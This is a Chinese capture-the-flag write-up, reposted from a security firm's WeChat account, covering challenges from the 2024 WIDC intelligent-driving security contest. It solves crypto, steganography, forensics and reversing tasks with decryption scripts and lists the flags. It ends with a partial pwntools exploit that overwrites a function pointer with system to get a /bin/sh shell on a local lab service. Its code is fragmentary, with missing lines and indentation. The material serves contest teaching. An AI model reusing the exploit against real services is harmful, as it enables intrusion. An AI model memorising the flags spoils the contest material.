(1)使用记事本打开,看到存在base64编码的png图片
(3)使用脚本查看图片原始高度和宽度,使用010editor打开图片复原
(2)解压升级包,有一个应用镜像文件,binwalk分析是文件系统文件
(4)查看文件中,是AES加密和其他加密组成,flag文件中存放的应该是AES加密后的flag内容
(6)从encode应用文件中逆向到,main函数读取一个私钥文件,对其内容进行加密,采用的simon硬件算法加密,其中v8为key
(8)通过包中获取key的脚本,可以知道AES的密钥生成,编写脚本解密
z_sequence = [1, 0, 0, 0, 1, 0, 1, 1, 0, 1, 1, 0, 1]
word_mask = 2**word_size – 1
def left_rotate(x, r, word_size=32):
return ((x << r) & (2**word_size – 1)) | (x >> (word_size – r))
def right_rotate(x, r, word_size=32):
return (x >> r) | ((x << (word_size – r)) & (2**word_size – 1))
def split(value, word_size=32):
return (value >> word_size, value & (2**word_size – 1))
def join(left, right, word_size=32):
return (left << word_size) | right
key = right_rotate(key, 3, word_size)
key = (key ^ k[i – 1]) ^ right_rotate(k[i – 1], 1, word_size)
key = (~key & word_mask) ^ (c & word_mask) ^ z[(i – 1) % len(z)]
def simon_decrypt(ciphertext, keys):
x, y = split(ciphertext, word_size)
for i in reversed(range(num_rounds)):
y = x ^ (left_rotate(y, 1, word_size) & left_rotate(y, 8, word_size)) ^ left_rotate(y, 2, word_size) ^ keys[i % len(keys)]
return join(x, y, word_size)
ciphertext = 0x2b34ead18bdb8d4d # Your ciphertext here as a hexadecimal number
keys = key_schedule(0x1918111009080100) # Assuming key is already defined
plaintext = simon_decrypt(ciphertext, keys)
print(f”test-Plaintext: {plaintext:016x}”)
def aes_decrypt(iv, ciphertext, key):
cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend=default_backend())
decryptor = cipher.decryptor()
padded_plaintext = decryptor.update(ciphertext) + decryptor.finalize()
unpadder = padding.PKCS7(128).unpadder()
plaintext = unpadder.update(padded_plaintext) + unpadder.finalize()
iv = b’xddx92xd2x1axb8xe2<Hxb7xfaNx94xc8x1a$xb3′
ciptext = b’xebxb1J:}xb6xadSx89x86xabxe7x9bsxd5xebyxf2xdexd2nxf9xa3xa8Gkxb2$BEx03x9fxa1xf7xa9x19x85Sxa8Yxe2Vx98x8dx1eux84xbd`-xcaxd4xc3Em\xd1xa1xf7i6xcbx0cx842txccx94xe6x94xeeAxb4Hxd32hxf5x13K’
print(f”flag:{aes_decrypt(iv, ciptext, key)}”)
(2)找到对应的响应包,对数据进行转换(最后一个A不用管)663662743277333738766F6C3432667539767A366130746E6730393265373362636238366665373037306745327344424E636F6E516643576D317368
flag:6bt2w378vol42fu9vz6a0tng092e73bcb86fe7070gE2sDBNconQfCWm1sh
安全驾驶秘密,秘密就在1111111111111110附近
for y in range(img.size[1]):
for x in range(img.size[0]):
pixel = list(img.getpixel((x, y)))
for n in range(3): # Assuming the use of RGB
binary_data += str(pixel[n] & 1)
# Check for the stop sequence “1111111111111110”
if len(binary_data) >= 16 and binary_data[-16:] == “1111111111111110”:
if __name__ == “__main__”:
encoded_image_path = “LSB.png”
encoded_image = Image.open(encoded_image_path)
binary_secret_msg = decode_image(encoded_image)
for i in range(0, len(binary_secret_msg), 8):
secret_msg += chr(int(binary_secret_msg[i:i+8], 2))
print(“Hidden message:”, secret_msg)
(1)用的是同余加密体系,这里使用lll算法计算私钥:
m = matrix([[1,h],[0,q]])
f=104487247500523630173466372012725893519340931300717034092093816350849886822853396168341013290959218180002031254321615523603199349964982692123231600651096747843269073795060299161138930217923899257522072771491233070803811809812208840371872635298833148136787331270890661224119684926154327930512610649281320612648
g=124543096895293893329367669185601759252473199871894159618224942112012325224062867378866918876501559305963983337570110136768019392332660013395569122436762967931653460895335031144428244801453964870767329929024450393254183082388201674464525220841626637783670034040457808515142474641802222980794941462034685363019
return (pow(f, -1, g) * a) % g
67557894833899879721535443738683635889742076553897445643184762026832680586233392404925048827896424102785684459189389647962484转化为字符串得到:f2jmf5ld0akrqhxmd7ig3ad22b0eda76e391RQ9tZMH5CBjPthat
车辆与云平台的数据传输需要加密,数据的机密性和完整性是很重要的,可以使用最常用的对称加密方式加密数据
(2)使用binwalk工具查看file文件是什么文件,是一个压缩文件
(4)是一张图片,打开图片查看,是一张椭圆圆锥曲线的图
(5)结合图片命名ecdh.jpg可以判定是ecdh非对称加密产生共享密钥的加密算法,这样的话需要密钥对,公私钥对,查找公私钥对,应该是隐写在图片中了,使用工具steghide提取出图片中的文件
(6)提取出一个密钥文件,一个私钥,仔细一下公钥在底部
(7)通过公私钥对生成共享密钥,也就是加密传输的密钥
密钥:a5291d0b92cbbb8c34c25ca2b0724f82f2a762b2de6937e76ee9b423d9dd5f2b
(8)从题干中得知是采用常用对称加密方式,那么可能是AES对称加密,编辑脚本解密加密数据,解密成功,flag: fujp25byzlvasugcfa703220129370acpbQArtDUeye
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import ec
def generate_shared_key(private_key_path, public_key_path):
with open(private_key_path, “rb”) as private_key_file:
private_key_data = private_key_file.read()
private_key = serialization.load_pem_private_key(private_key_data, password=None)
with open(public_key_path, “rb”) as public_key_file:
public_key_data = public_key_file.read()
public_key = serialization.load_pem_public_key(public_key_data)
shared_key = private_key.exchange(ec.ECDH(), public_key)
private_key_path = “private_key.txt”
public_key_path = “public_key.txt”
shared_key = generate_shared_key(private_key_path, public_key_path)
print(“Shared Key:”, shared_key.hex())
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import padding
shared_key = b’xa5x29x1dx0bx92xcbxbbx8cx34xc2x5cxa2xb0x72x4fx82xf2xa7x62xb2xdex69x37xe7x6exe9xb4x23xd9xddx5fx2b’
ciphertext = b’x78xf7x89xb8x50x73x9dx31x41x3ax8fxc1xf6x9dx71x03x28x77x4fx12x61x6dx0fxfax52x6dx8bxf0x2fx42x57xd2x9fx1dx77x8cx1ex95x2fxbax17x10xb1x7bx64x7fx5exf8′
cipher = Cipher(algorithms.AES(shared_key), modes.ECB(), backend=default_backend())
decryptor = cipher.decryptor()
decrypted_padded_text = decryptor.update(ciphertext) + decryptor.finalize()
unpadder = padding.PKCS7(128).unpadder()
decrypted_text = unpadder.update(decrypted_padded_text) + unpadder.finalize()
print(“Flag:”, decrypted_text.decode())
(1)流程:获取用户输入->应用读取sdcard程序下写入的加密值->将用户的输入在so进行加密,对比两个值是否一致
char* decrypt(const char* input, int key) {
char* decrypted = (char*)malloc((len + 1) * sizeof(char));
for (int i = 0; i < len; i++) {
if (c >= ‘0’ && c <= ‘9’) {
c = (c – ‘0’ – key + 10) % 10 + ‘0’;
} else if (c >= ‘a’ && c <= ‘z’) {
c = (c – ‘a’ – key + 26) % 26 + ‘a’;
} else if (c >= ‘A’ && c <= ‘Z’) {
c = (c – ‘A’ – key + 26) % 26 + ‘A’;
(1)根据文件名可确定当前文件为内存文件,使用内存分析工具volatility进行分析,查看相关进程
(1)使用python3.8的环境安装uncompyle6反编译工具
(3)这里说明python版本不对,这里将python版本进行降级,降为python 3.8.16
(4)反编译程序进行正常的解密,但是magic number不对。使用python 3.8.16编译一个正常头的pyc文件,然后进行修复
修复后如下:
(7)直接查看python源代码,可以看到加密的算法及相关常量
(1.1)分析流量包,传输的报文协议是明文传输的,只转换了base64数据传输
发现有大量明文字节传输,这里不做提示,细心挨个看就能找到,发了好几遍的密钥和flag的base64 可以直接搜索192.168.168.28的传输系列
(2)整个数据传输过程只有私钥和加密后的flag有用,然后使用openssl做base64解密
(3)将密钥提取出来,也是base64解密为ASCII值,但是不用openssl,因为openssl解不了这么长的编码
(4)再用kali openssl解密flag0txt,密码是1234。在pcap的压缩中,加了1234的注释,后面都是烟雾弹
flag是:f8hy7mkslgln0asc12dg85d39fb100041f6a2J6jbs17I4iYE9cbread
漏洞主要存在于load和save对offset的缺失检查,这一缺陷导致了vm stack的越界访问与 写入。本题涉及的是静态编译,并且system 函数也被包含在内,因此 f_h 和 system 等关键 地址均为已知。鉴于stack->data 指向堆内存,我们需首先利用 load 函数将堆地址读入 vm stack 中。随后, 通过与bss 上的 f_h 进行 sub 再 div4,可以计算出堆地址与 f_h 之间的偏移量。完成这一步 骤后,将system 函数的地址写入相应位置。此后,当触发 free(input)的操作时,即可执行system(“/bin/sh”)命令,从而达到预期的目标。
# Set context for pwntools
context.log_level = ‘debug’
context.terminal = [‘gnome-terminal’, ‘-x’, ‘bash’, ‘-c’]
# Define shorthand functions for interactions
cn = remote(‘127.0.0.1’, 8888)
ru = lambda x: cn.recvuntil(x)
sn = lambda x: cn.send(x)
rl = lambda: cn.recvline()
sl = lambda x: cn.sendline(x)
rv = lambda x: cn.recv(x)
sa = lambda a, b: cn.sendafter(a, b)
sla = lambda a, b: cn.sendlineafter(a, b)
# Load the binary without checking the security
bin = ELF(‘./pwn’, checksec=False)
# Constants for the exploit
# Function to create a space-delimited string from a list
return ” “.join([str(x) for x in d])
# Construct the code and data to send
code = create([push, push, push, push, load, push, sub, div, save])
data = create([“/bin/sh”, s_a, 4, h_o, f_h])
# Send the code and data to the remote service
# Interact with the service after sending the payload
作为本次WIDC赛事活动的支撑单位之一,为辰信安已连年支撑多届汽车攻防相关赛事,自2021年支持鹏城实验室协办了“首届智能汽车网络安全大赛”起,连续支持了“鹏城杯”、“创安杯”、CICV、WIDC等20余场“护车行动”攻防赛事,为赛事提供了靶场环境搭建、赛题编制、赛事执裁、运行保障、应急响应等技术支撑,将汽车网络靶场技术与智能汽车网络安全场景深度融合。
原文始发于微信公众号(为辰信安):【WriteUP·下篇】2024WIDC世界智能驾驶挑战赛“天融信杯”信息安全攻防赛
修复后如下:
